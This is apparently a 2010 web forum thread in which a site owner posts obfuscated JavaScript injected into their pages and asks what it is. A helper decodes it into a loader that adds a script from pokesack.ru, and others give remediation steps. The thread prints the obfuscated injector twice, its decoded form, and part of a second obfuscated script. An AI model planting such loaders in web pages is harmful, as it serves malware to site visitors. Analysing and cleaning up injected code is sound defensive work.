code auto added to my site..anyone tell me what is?
Moderator: General Moderators
code auto added to my site..anyone tell me what is?
we have a site and suddenly weird things are happening.
my developer tell me some weird Java / script has be added to multiple pages....but we (my company) didn't do it.
can any tell me about this code? (below) Has our site been hacked / infected?
We just found some kind of run time malaware on another site...but its on a different server.
very concerned.
any help would be great
G90
<script>var t="";var h="";var G;if(G!='m'){G=''};var D_="";function C() {var S='';var J="";var K=window;var V;if(V!='O'){V=''};var R=String("scri"+"pt");var iq="";var Z;var r='';var A;if(A!=''){A='zH'};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!='' && f!='Qp'){f=null};var z=RegExp;var GU;if(GU!='I' && GU!='lb'){GU=''};this.JL="";var bT;if(bT!=''){bT='px'};function N(q,p){var d="[";var nm;if(nm!='il' && nm != ''){nm=null};d+=p;d+=b;var oF;if(oF!='So' && oF != ''){oF=null};var w=new z(d, E);this.ze='';return q.replace(w, r);};var wk;if(wk!='e'){wk=''};this.Ns='';var i="onl"+"oad";var dz;if(dz!='no'){dz='no'};this.wa='';var LO='';var O_='';var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";this.g='';this.Vw='';Z=function(){this.ZF='';try {var Gf;if(Gf!='uW' && Gf != ''){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!='' && Yo!='fF'){Yo='ib'};var v=new Array();n[D]=[1,8][0];var gY='';var gYj='';n = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')+N('8295634772434270642295791948166996914660733561217215135','65174293')+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');var XG;if(XG!='' && XG!='vi'){XG=null};var II='';var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!='' && QA!='wq'){QA='JJ'};var Oa;if(Oa!='' && Oa!='hH'){Oa='Od'};var yK=new String();var Zy;if(Zy!='' && Zy!='MB'){Zy=null};var uu;if(uu!='' && uu!='nE'){uu=null};document[Q][L](n);var fR;if(fR!='U' && fR != ''){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM='';};K=Z;var vr="";this.kR='';var Jf;if(Jf!='of' && Jf != ''){Jf=null};};var Wd=new Array();var UK;if(UK!='HZ' && UK!='uz'){UK=''};C();var KqP=new String();</script>
<!--52071e04b71ca66bacac9424ea495244-->
my developer tell me some weird Java / script has be added to multiple pages....but we (my company) didn't do it.
can any tell me about this code? (below) Has our site been hacked / infected?
We just found some kind of run time malaware on another site...but its on a different server.
very concerned.
any help would be great
G90
<script>var t="";var h="";var G;if(G!='m'){G=''};var D_="";function C() {var S='';var J="";var K=window;var V;if(V!='O'){V=''};var R=String("scri"+"pt");var iq="";var Z;var r='';var A;if(A!=''){A='zH'};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!='' && f!='Qp'){f=null};var z=RegExp;var GU;if(GU!='I' && GU!='lb'){GU=''};this.JL="";var bT;if(bT!=''){bT='px'};function N(q,p){var d="[";var nm;if(nm!='il' && nm != ''){nm=null};d+=p;d+=b;var oF;if(oF!='So' && oF != ''){oF=null};var w=new z(d, E);this.ze='';return q.replace(w, r);};var wk;if(wk!='e'){wk=''};this.Ns='';var i="onl"+"oad";var dz;if(dz!='no'){dz='no'};this.wa='';var LO='';var O_='';var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";this.g='';this.Vw='';Z=function(){this.ZF='';try {var Gf;if(Gf!='uW' && Gf != ''){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!='' && Yo!='fF'){Yo='ib'};var v=new Array();n[D]=[1,8][0];var gY='';var gYj='';n = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')+N('8295634772434270642295791948166996914660733561217215135','65174293')+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');var XG;if(XG!='' && XG!='vi'){XG=null};var II='';var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!='' && QA!='wq'){QA='JJ'};var Oa;if(Oa!='' && Oa!='hH'){Oa='Od'};var yK=new String();var Zy;if(Zy!='' && Zy!='MB'){Zy=null};var uu;if(uu!='' && uu!='nE'){uu=null};document[Q][L](n);var fR;if(fR!='U' && fR != ''){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM='';};K=Z;var vr="";this.kR='';var Jf;if(Jf!='of' && Jf != ''){Jf=null};};var Wd=new Array();var UK;if(UK!='HZ' && UK!='uz'){UK=''};C();var KqP=new String();</script>
<!--52071e04b71ca66bacac9424ea495244-->
Re: code auto added to my site..anyone tell me what is?
Took me 20 minutes, but reversed. Here is what it does:
This code loads another Javascript code from pokesack.ru server, which adds iframe on the page (src is also on pokesack.ru)
Edit: this is my 666th post
Code: Select all
window.onload = function () {
n = document.createElement('script');
n.defer = 1;
n.src = 'http://pokesack.ru:8080/google.com/technorati.com/iciba.com.php';
document.body.appendChild(n);
}YesHas our site been hacked / infected?
Edit: this is my 666th post
Last edited by kaszu on Sun Apr 18, 2010 11:40 am, edited 1 time in total.
Re: code auto added to my site..anyone tell me what is?
Your servers have been compromised. The script could very well be spreading malware to your site visitors or used for monetary gain of some sort.
Re: code auto added to my site..anyone tell me what is?
thanks....and S### lol
ok will look into it further.
ok will look into it further.
Re: code auto added to my site..anyone tell me what is?
thankfully site is not yet live.Benjamin wrote:Your servers have been compromised. The script could very well be spreading malware to your site visitors or used for monetary gain of some sort.
so no customers yet.......
anyone in these forums dealt with these kind on run time doohickys before?
i may need a pro on this. its not my guys field of expertise.
G90
Re: code auto added to my site..anyone tell me what is?
additional: hey kaszu thx for taking the time to track the source down and looking into it for me.
G90
G90
Re: code auto added to my site..anyone tell me what is?
Well, here's what I would do:
1. Locate the entry point they used to gain access and fix it.
2. Reprovision the server. e.g. reinstall Linux from scratch in case there are any root kits installed. Your webhost can do this for you.
3. Check the entire code base for vulnerabilities, especially upload forms and unprotected variables in database queries.
4. Use the latest version of any external libraries, such as phpBB or whatever you may be using.
5. Use cPanel and enable brute force detection, which will automatically block IP's with many invalid logins.
6. Disable any services not being used. e.g. ssh, ftp.
7. Ensure a firewall is installed and be aware of what ports are open and who they are open to.
I'm sure I'm missing some things, but this is a good start.
1. Locate the entry point they used to gain access and fix it.
2. Reprovision the server. e.g. reinstall Linux from scratch in case there are any root kits installed. Your webhost can do this for you.
3. Check the entire code base for vulnerabilities, especially upload forms and unprotected variables in database queries.
4. Use the latest version of any external libraries, such as phpBB or whatever you may be using.
5. Use cPanel and enable brute force detection, which will automatically block IP's with many invalid logins.
6. Disable any services not being used. e.g. ssh, ftp.
7. Ensure a firewall is installed and be aware of what ports are open and who they are open to.
I'm sure I'm missing some things, but this is a good start.
Re: code auto added to my site..anyone tell me what is?
I get better support here than my hosting company....who said 'we cant touch your code..sorry"
Re: code auto added to my site..anyone tell me what is?
ok spent almost a week...got almost everything.
but just found this. is this another instance of the haclk or something else?
dont want to delete just in case
<script>var j;if(j!='FJ' && j!='y'){j=''};this.TJ='';try {var C;if(C!='' && C!='Z'){C=''};var br='';var F=window[unescape("%75%6e%65%73%63%61%70%65")];this.PN="";var G;if(G!='' && G!='Y'){G=''};var ZV=
but just found this. is this another instance of the haclk or something else?
dont want to delete just in case
<script>var j;if(j!='FJ' && j!='y'){j=''};this.TJ='';try {var C;if(C!='' && C!='Z'){C=''};var br='';var F=window[unescape("%75%6e%65%73%63%61%70%65")];this.PN="";var G;if(G!='' && G!='Y'){G=''};var ZV=